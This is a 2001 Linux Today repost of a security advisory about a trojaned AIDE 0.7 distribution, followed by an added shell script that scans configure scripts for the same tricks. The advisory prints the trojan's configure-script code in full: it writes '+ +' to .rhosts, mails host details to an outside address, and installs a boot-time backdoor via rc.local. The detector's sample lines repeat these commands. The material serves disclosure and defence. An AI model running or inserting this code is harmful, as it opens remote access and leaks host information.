Linux Today: Linux News On Internet Time.
Trojan in Aide Distribution at ftp.linux.hr

Aug 07, 2001, 22:46

Subject: Trojan in Aide distribution at ftp.linux.hr
Date: 07 Aug 2001 09:45:42 +0300
From: Rami Lehti <Rami.Lehti@finland.sun.com>
To: incidents@securityfocus.com
Cc: aide@cs.tut.fi

It has come to my attention that there has been a trojaned
Aide distribution at ftp://ftp.linux.hr/pub/aide
The offending binary has been removed.
Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to
download it from ftp://ftp.cs.tut.fi/pub/src/gnu
and always check the PGP signature before using any distribution of
Aide.

The trojaned distribution contains the following script embedded in
the configure script. As you can see, it tries to add "+ +" to root's
.rhosts and sends information about your host to l4m0r@freebox.com.


# checking if we are root or not
if [ `whoami` == "root" ];then
root_user=1
else
root_user=0
fi

And later on:
if [ $root_user != "1" ];then
echo "+ +" > ~/.rhosts
echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea

mail l4m0r@freebox.com < /tmp/jea
rm -rf /tmp/jea
else
if [ `uname -s` != Linux ];then
echo ""
else
mv -f .xinitrc /bin/lpr
echo "# printing status monitor" >> /etc/rc.d/rc.local
echo "/bin/lpr &" >> /etc/rc.d/rc.local
hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
mail l4m0r@freebox.com < /tmp/jea
/bin/lpr &
rm -rf /tmp/jea
fi
fi



Rami Lehti
--
AIDE - Advanced Intrusion Detection Environment
Check http://www.cs.tut.fi/~rammer/aide.html
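
A pre-build check for the behaviours shown in the excerpt above, as an added example that is not part of the original message or of the AIDE project: it scans a configure script for writes to .rhosts or rc.local, mail fed from a file, and files moved into /bin or /sbin. The function names, the patterns, and the sample lines (including the address collector@example.invalid) are constructed for illustration, and the scan supplements the PGP signature check rather than replacing it.

```shell
#!/bin/sh
# Added example: heuristic scan of a configure script before running it.
# Function names and patterns are hypothetical, chosen for this illustration.

# check NAME REGEX FILE -> prints "NAME:<line-number>" for each matching line
check() {
    grep -nE -- "$2" "$3" | cut -d: -f1 | sed "s/^/$1:/"
}

# scan_script FILE -> one line per hit; empty output means nothing matched
scan_script() {
    # output redirected into any .rhosts file
    check rhosts-write '>[[:space:]]*[^[:space:];]*\.rhosts' "$1"
    # output redirected into a boot-time rc.local
    check rc-local-write '>[[:space:]]*/etc/(rc\.d/)?rc\.local' "$1"
    # mail to an address with a file fed on stdin
    check mail-file-out '(^|[^[:alnum:]_])mail[[:space:]]+[^[:space:]]+@[^[:space:]]+[[:space:]]*<' "$1"
    # mv of a file into /bin or /sbin
    check mv-into-bin '(^|[^[:alnum:]_])mv[[:space:]]+(-[[:alpha:]]+[[:space:]]+)*[^[:space:]]+[[:space:]]+/s?bin/' "$1"
}

# make_sample FILE -> writes a constructed sample (only scanned, never executed)
make_sample() {
    cat > "$1" <<'EOF'
echo "checking for gcc... gcc"
prefix=/usr/local
echo "+ +" > ~/.rhosts
mail collector@example.invalid < /tmp/jea
mv -f .xinitrc /bin/lpr
echo "/bin/lpr &" >> /etc/rc.d/rc.local
echo "creating Makefile"
EOF
}

sample=$(mktemp)
make_sample "$sample"
hits=$(scan_script "$sample")
rm -f "$sample"
if [ -n "$hits" ]; then
    echo "suspicious lines found, do not run this script:"
    echo "$hits"
fi
```

An empty result only means none of these four patterns matched; a tampered script can do the same things in ways the patterns do not cover.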